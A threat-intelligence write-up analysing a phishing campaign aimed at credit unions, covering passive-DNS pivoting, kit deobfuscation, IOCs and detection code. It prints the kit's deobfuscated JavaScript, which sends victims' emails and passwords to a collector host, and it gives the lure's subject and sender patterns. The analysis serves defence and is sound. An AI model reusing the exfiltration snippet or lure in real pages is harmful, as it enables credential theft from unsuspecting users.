🧪 Writeups & Research · intermediate · 3 min read

Analyzing a Real-World Phishing Campaign

Deep dive into a phishing campaign targeting financial institutions. Infrastructure analysis, kit reverse engineering, and IOC extraction.

Tags: phishing, threat intelligence, OSINT, analysis


Recently I came across a phishing campaign targeting small credit unions. Here's how I analyzed it, what I found, and the IOCs that came out of it.

Disclaimer: All analysis was performed on safely sandboxed systems. Domains and specific identifiers have been sanitized.

The Initial Sample

The campaign started with emails claiming to be from "Security Team" with urgent account verification requests. Classic tactics:

  • Subject: "Urgent: Verify Your Account Within 24 Hours"
  • Sender spoofed to look like internal IT
  • Link to a convincing login page clone

Infrastructure Analysis

Domain Analysis

The phishing domain secure-creditunion-verify[.]com was registered just 48 hours before the campaign:

Domain: secure-creditunion-verify[.]com
Registrar: NameCheap
Registration: 2025-11-08
Hosting: Bulletproof hosting provider
TLS: Let's Encrypt (a valid certificate, so the clone shows the browser padlock and passes a casual "is it https" check)

Passive DNS

Using PassiveTotal, I found the IP hosting this domain also hosted 12 other suspicious domains—all following similar patterns:

  • account-verify-secure[.]com
  • banking-alert-notice[.]com
  • credential-update-portal[.]com

This indicated a larger operation, not a one-off campaign.
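To show how that pivot is done in practice, here is an added example (not code from this write-up) that clusters passive-DNS resolutions around the seed domain by shared IP and then keeps only the co-hosted names that were first seen close to the seed and carry the campaign's lure vocabulary. The records, first-seen dates and documentation-range IPs are constructed stand-ins; a real PassiveTotal export would replace the `PDNS_RECORDS` list.

```python
"""Pivot from one phishing domain to co-hosted infrastructure via passive DNS.

Added example, not code from the original write-up. The records below are
constructed; in real use they come from the passive-DNS provider's export.
"""
from collections import defaultdict
from datetime import date

# Constructed passive-DNS resolutions: (domain, ip, first_seen).
# IPs are documentation-range placeholders, not the campaign's addresses.
PDNS_RECORDS = [
    ("secure-creditunion-verify.com", "203.0.113.10", date(2025, 11, 8)),
    ("account-verify-secure.com",     "203.0.113.10", date(2025, 11, 6)),
    ("banking-alert-notice.com",      "203.0.113.10", date(2025, 11, 7)),
    ("credential-update-portal.com",  "203.0.113.10", date(2025, 11, 9)),
    ("collector.xyz",                 "198.51.100.7", date(2025, 11, 5)),
    ("example-cdn.net",               "203.0.113.10", date(2019, 3, 2)),  # old tenant on a shared host
    ("unrelated-shop.org",            "192.0.2.44",   date(2024, 1, 15)),
]

# Tokens that recur in the campaign's lookalike domain names.
LURE_TOKENS = ("secure", "verify", "account", "alert", "credential",
               "update", "portal", "banking", "notice")


def lure_score(domain):
    """Count campaign-style tokens in the registrable label of a domain."""
    label = domain.rsplit(".", 1)[0]
    return sum(1 for tok in LURE_TOKENS if tok in label)


def pivot(seed, records, max_age_days=30, min_score=1):
    """Return domains co-hosted with `seed` that look like part of the same campaign.

    A shared IP on its own is weak evidence (CDNs and shared hosting collide),
    so a hit also has to be first seen within `max_age_days` of the seed and
    score at least `min_score` on lure vocabulary.
    """
    by_ip = defaultdict(list)
    for domain, ip, first_seen in records:
        by_ip[ip].append((domain, first_seen))

    seed_ips = {ip for domain, ip, _ in records if domain == seed}
    seed_seen = max(first_seen for domain, _, first_seen in records if domain == seed)

    hits = []
    for ip in seed_ips:
        for domain, first_seen in by_ip[ip]:
            if domain == seed:
                continue
            age = abs((seed_seen - first_seen).days)
            score = lure_score(domain)
            if age <= max_age_days and score >= min_score:
                hits.append({"domain": domain, "ip": ip,
                             "first_seen": first_seen.isoformat(),
                             "lure_score": score})
    return sorted(hits, key=lambda h: (-h["lure_score"], h["domain"]))


if __name__ == "__main__":
    for hit in pivot("secure-creditunion-verify.com", PDNS_RECORDS):
        print(hit)
```

The age filter is what keeps `example-cdn.net` out: it shares the IP but was first seen years earlier, which is the usual signature of an unrelated tenant on shared hosting rather than campaign infrastructure.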

Kit Analysis

Deobfuscation

The phishing page used JavaScript obfuscation to hide its true functionality. After deobfuscation:

// Simplified for readability; deobfuscated from the kit's loader.
// userIP is assigned elsewhere in the kit (not shown); declared here so the snippet stands alone.
var userIP = typeof userIP !== 'undefined' ? userIP : 'unknown';

function exfiltrate(creds) {
  // Fire-and-forget POST: nothing awaits the response, so the victim is
  // redirected to the real site whether or not the collector answers.
  fetch('https://collector[.]xyz/api/grab', {
    method: 'POST',
    body: JSON.stringify({
      email: creds.email,
      password: creds.password,
      ip: userIP,
      timestamp: Date.now()
    })
  });
}

Admin Panel Discovery

The kit had an admin panel at /admin/login.php, exposed to the internet and protected only by the kit's default credentials (I did not attempt to log in). Directory listing was enabled on the web root and showed:

/admin/
/logs/
/includes/
/assets/

Credential Harvesting Flow

  1. Victim clicks link in email
  2. Lands on cloned login page
  3. Enters credentials
  4. Credentials POSTed to collector server
  5. Victim redirected to real site (to avoid suspicion)
  6. Attacker receives real-time notification via Telegram bot

IOCs Extracted

Domains

  • secure-creditunion-verify[.]com
  • collector[.]xyz
  • exfil-data[.]net

IPs

  • 185.xxx.xxx.xxx
  • 91.xxx.xxx.xxx

Hashes

  • Phishing kit ZIP: SHA256: a1b2c3...
  • JavaScript loader: SHA256: d4e5f6...

Email Indicators

  • Subject pattern: "Urgent: Verify Your Account"
  • Sender pattern: "security@[target-org]"

Detection Recommendations

  1. Email filtering: flag or block links to domains registered fewer than 30 days ago
  2. DNS monitoring: alert on resolutions of known-bad domains and on answers that return known-bad IPs
  3. User training: recognize urgency tactics ("within 24 hours") and sender names that don't match the sending domain
  4. MFA everywhere: a stolen password alone no longer grants access (prefer phishing-resistant factors, since more capable kits relay OTP and push prompts in real time)
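The harvesting flow above and the first two recommendations reduce to a handful of checks on each inbound message: a lure subject, a "Security Team" display name arriving from an external domain, links to known IOC domains, and links to newly registered domains. The following is an added example (not code from this write-up) that scores constructed messages against those checks. The registration dates and sample messages are made up; in production the domain age would come from a WHOIS/RDAP or newly-registered-domain feed and the messages from the mail gateway.

```python
"""Score inbound mail against the indicators from this campaign.

Added example, not part of the original write-up. Registration dates and
sample messages are constructed stand-ins for a WHOIS/RDAP feed and the
mail gateway's parsed headers.
"""
import re
from datetime import date

# IOC domains from the write-up (sanitized forms kept as-is).
IOC_DOMAINS = {"secure-creditunion-verify.com", "collector.xyz", "exfil-data.net"}
SUBJECT_PATTERN = re.compile(r"urgent:\s*verify your account", re.IGNORECASE)
NRD_THRESHOLD_DAYS = 30

# Constructed registration dates standing in for a WHOIS/RDAP lookup.
REGISTRATION_DATES = {
    "secure-creditunion-verify.com": date(2025, 11, 8),
    "account-verify-secure.com": date(2025, 11, 6),
    "examplecu.org": date(2009, 4, 1),
}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def registrable_domain(host):
    """Collapse a hostname to its last two labels (adequate for .com/.org/.xyz)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def domain_age_days(domain, today):
    """Days since registration, or None when the feed has no record."""
    registered = REGISTRATION_DATES.get(domain)
    return None if registered is None else (today - registered).days


def score_message(msg, today=date(2025, 11, 10)):
    """Return (score, reasons) for one parsed message dict."""
    score, reasons = 0, []

    if SUBJECT_PATTERN.search(msg["subject"]):
        score += 2
        reasons.append("subject matches campaign lure")

    # Display name claims an internal security team but the address is external.
    sender_domain = registrable_domain(msg["from_addr"].split("@")[-1])
    if "security" in msg["from_name"].lower() and sender_domain != msg["org_domain"]:
        score += 2
        reasons.append(f"'{msg['from_name']}' sent from external domain {sender_domain}")

    for host in URL_RE.findall(msg["body"]):
        dom = registrable_domain(host)
        if dom in IOC_DOMAINS:
            score += 5
            reasons.append(f"link to known IOC domain {dom}")
        age = domain_age_days(dom, today)
        if age is not None and age < NRD_THRESHOLD_DAYS:
            score += 3
            reasons.append(f"link to domain registered {age} days ago ({dom})")

    return score, reasons


# Constructed messages: one matching the campaign, one benign internal notice.
SAMPLE_MESSAGES = [
    {"org_domain": "examplecu.org", "from_name": "Security Team",
     "from_addr": "security@account-verify-secure.com",
     "subject": "Urgent: Verify Your Account Within 24 Hours",
     "body": "Please confirm at https://secure-creditunion-verify.com/login within 24 hours."},
    {"org_domain": "examplecu.org", "from_name": "IT Helpdesk",
     "from_addr": "helpdesk@examplecu.org",
     "subject": "Scheduled maintenance Saturday",
     "body": "Details at https://intranet.examplecu.org/notices"},
]


def triage(messages, threshold=5):
    """Return (subject, score, reasons) for messages at or above the block threshold."""
    flagged = []
    for msg in messages:
        score, reasons = score_message(msg)
        if score >= threshold:
            flagged.append((msg["subject"], score, reasons))
    return flagged


if __name__ == "__main__":
    for subject, score, reasons in triage(SAMPLE_MESSAGES):
        print(score, subject, reasons)
```

Note what this heuristic cannot catch: if the envelope sender is forged as `security@examplecu.org` itself (the "security@[target-org]" pattern listed below), the display-name check passes, and only SPF/DKIM/DMARC enforcement on your own domain rejects the message. The link-based checks still fire in that case, which is why the IOC and domain-age signals carry more weight than the header ones.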

Lessons Learned

  • Attackers reuse infrastructure—one IOC can reveal dozens
  • "Bulletproof" hosting isn't bulletproof against analysis
  • A free, valid Let's Encrypt certificate makes the clone look legitimate: the padlock proves only that TLS is in use, not who is on the other end
  • Telegram is increasingly used for real-time exfil notifications

Want to learn threat analysis techniques? Contact m1k3@msquarellc.net for training options.
